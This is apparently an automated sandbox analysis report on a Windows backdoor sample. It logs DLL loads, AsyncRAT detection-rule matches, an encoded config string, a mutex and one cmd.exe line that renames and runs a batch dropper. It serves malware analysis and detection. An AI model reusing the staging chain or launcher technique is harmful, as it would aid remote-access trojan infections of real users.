              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: aclayers.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: sfc.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: wtsapi32.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: winsta.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pifSection loaded: wldp.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Settings.csBase64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Settings.csBase64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Settings.csBase64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Settings.csBase64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Settings.csBase64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@46/20@1/1
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B41FA GetLastError,FormatMessageW,11_2_004B41FA
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_004A2010
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A1A0B AdjustTokenPrivileges,CloseHandle,11_2_004A1A0B
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404967
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_004ADD87
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_004B3A0E
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\CommanderJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3628:120:WilError_03
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:64:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\0vyG14tDobaS6ejo
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeFile created: C:\Users\user~1\AppData\Local\Temp\nskE4D4.tmpJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeVirustotal: Detection: 21%
